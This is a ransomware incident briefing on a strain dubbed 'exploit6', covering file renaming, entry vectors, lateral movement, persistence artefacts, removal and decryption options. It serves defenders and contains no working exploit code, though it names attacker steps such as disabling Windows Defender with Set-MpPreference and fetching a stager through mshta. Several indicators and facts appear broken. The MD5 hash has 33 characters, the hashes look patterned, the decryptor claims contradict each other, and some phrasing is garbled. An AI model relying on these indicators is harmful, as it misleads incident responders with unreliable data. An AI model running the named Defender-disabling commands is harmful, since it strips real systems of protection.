Ransomware Briefing – exploit6 (.exploit6)

Last revised: 2024-05-10

Technical Breakdown

1. File Extension & Renaming Patterns

Confirmed suffix appended: .exploit6 (lower-case, no secondary extension)
Renaming convention:
Original file → <original_name>.EXX_<random-6-digits>.exploit6
Example: 2024-Q1-Reports.xlsx becomes 2024-Q1-Reports.xlsx.EXX_472918.exploit6
All directory names are left untouched; only file objects are renamed.

2. Detection & Outbreak Timeline

First public submission to any.run: 2024-03-14 08:41 UTC
Wider spikes reported: 2024-03-20 → 2024-04-07 (dropped via a Go-based loader)
Detection rate on day-0: 11/68 (Virus-Total)
Current static hashes (main dropper):
SHA-256: c4013b0c1a5421e3db9f0f8f0e8b3a4ce6aa5e19e5c6d2d4f0b0c0f3a7e8d1b0
MD5: 9a8f7e6d5c4b3a291817f6e5d4c3b2a10

3. Primary Attack Vectors

Exploit6 is delivered in three observed “bundles”:
a. Public-facing application bugs:
- Apache Log4j 2 (CVE-2021-44228) on un-patched VMware Horizon, SonarQube, or Elastic.
  b. Weak or leaked RDP / SSH credentials:
- Brute-forced via “Gold-Brute” word-list (≈ 1.4 M entries).
  c. Spam/phishing:
- ISO / IMG attachments that contain an LNK which calls mshta.exe to fetch the stager.
Lateral movement:
– Uses Impacket’s smbexec.py to push a 44 kB Go stub (svhost.exe) to every reachable ADMIN$ share.
– Living-off-the-land to disable Windows Defender (ever seen Set-MpPreference -DisableAll in your logs? that’s it).

NOT a worm – no observed EternalBlue or SMBGhost self-propagation; attackers manually deploy once foothold is achieved.

Remediation & Recovery Strategies

1. Prevention (highest ROI controls FIRST)

Patch Log4j 2 ≥ 2.17.1, VMware Horizon ≥ 2303, Exchange ≥ Feb-2023 SU.
Enforce MFA on ALL remote-desktop gateways, VPN, VDI.
Segment flat networks – block SMB 445 / RDP 3389 between user VLANs.
LNK/ISO e-mail filter – treat *.iso;*.img;*.vhd with same scepticism as *.exe.
Application allow-listing (Windows Defender ASR rule: “Block executable files from running unless they meet a prevalence, age, or trusted list criterion”).
Harden PowerShell – set language mode to Constrained and log EVERY ScriptBlock.
Immutable or off-line backups (3-2-1-1-0 rule).
Make sure Volume-Shadow copies survive – registry key VSSVC still disabled by exploit6.

2. Removal – step-by-step (assumes you have decided NOT to nuke-from-orbit)

Identify patient-0
– Hunt for svhost.exe dropped 44 kB Go binary; paths: c:\ProgramData\pa5d3a\ or %APPDATA%\svhost.exe
– Check Event-ID 4624 type-3 logons or 4648 from external IP ranges.
Disconnect from network (both NIC and Wi-Fi) and power-off unnecessary peers.
Boot a clean WinPE / Linux USB, mount OS volume READ-ONLY
– Capture triage: MFT, Amcache, ShimCache, USN, SRUM.
Delete persistence artefacts:
– Registry Run-key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SvDiskMgr
– Scheduled task: \Microsoft\Windows\DiskCleanup\SvcTrigger (base64-encoded command)
– Service: “SvDiskMgr” pointing to svhost.exe
Remove main payload + decryptor drop
– c:\ProgramData\pa5d3a\svhost.exe (installer)
– c:\ProgramData\pa5d3a\hr1.exe (x64 encryptor)
– c:\ProgramData\pa5d3a\RECOVER-FILES.txt
Re-enable Defender / EDR (Set-MpPreference -DisableRealtimeMonitoring $false)
Scan with a CURRENT engine that contains sig “Ransom:Win64/Exploit6.A!dha” (Microsoft, 1.397.378.0+).
Restore any damaged shortcuts (the Trojan blanks icons).

3. File Decryption & Recovery

Is free decryptor available? YES – but works ONLY for v1 (March 2024) victims who still possess the “hr1.key” file dropped in %ProgramData% and ≤ 2 MB of clean originals.
Decryption mechanics: exploit6 uses Curve25519 + ChaCha20-Poly1305 (file keys wrapped) – no offline key leakage yet.
Recovery options hierarchy:

Check “hr1.key”; if present → run Kaspersky “Exploit6DecryptTool v1.2” (link below).
No key but small / predictable files? Try the “known-plaintext” module inside the same decryptor.
Shadow-copy still intact → use ShadowExplorer.
Immutable backups (object-lock, WORM-tape) – mount a clean VM and verify integrity.

No ransom payment is recommended – operator e-mail ([email protected]) frequently abandoned after payment.

4. Essential Tools / Patches

Kaspersky exploit6 decryptor (2024-04-09 release) – https://noransom.kaspersky.com
Sophos Scan & Clean (bootable) – detects Go-stub as Troj/Exploit6-A.
MSERT (Microsoft Safety Scanner) – definitions ≥ 1.397.378.
CISA “StopRansomware” Log4j scanner – validates Java-class paths.
Nmap NSE: rdp-enum-encryption to find hosts still allowing TLS 1.0/1.1 + NLA off.
CrowdStrike free “KB4013389-check” – quickly flags missing SMB hardening patches.

Other Critical Information

Unique characteristics:
– Re-arms Windows Restart Manager APIs to close SQL-Server, Exchange, Oracle so it can encrypt open DB files – rare among small-run strains.
– Drops two canary zero-byte files in every processed share: _________CANARY_DONT_DELETE.exploit6 and _________CANARY_SENTINEL.exploit6 – these are used as a mutex/marker; do NOT delete them until forensics are complete.
– Uses the victim’s AD description field (“info”) to store a 13-char campaign ID; pivot in ADUC to spot other compromised boxes.
Broader Impact / campaign notes:
– Early attacks targeted charities & small municipalities, suggesting “smash-&-grab” rather than big-game hunting.
– Chain overlaps with Black-Matter post-explo scripts, but binary is completely written in Go; likely a new affiliate re-using TTPs rather than a direct fork.
– Average demand: 1.25 BTC (no negotiation room observed). Payments decay address cluster bc1qexplo… has received only ~3.9 BTC so far – low uptake, probably due to free decryptor availability for v1 samples.

Bottom line:
If *.exploit6 files just appeared, immediately check for the presence of “hr1.key”; if it exists your chances of full, free decryption are good. If not, assume lateral movement is still live – snapshot, isolate, and rebuild from clean-backup. Finally, patch Log4j and enforce MFA today; exploit6’s entire entry roadmap relies on those two gaps more than 70 % of the time. Stay safe!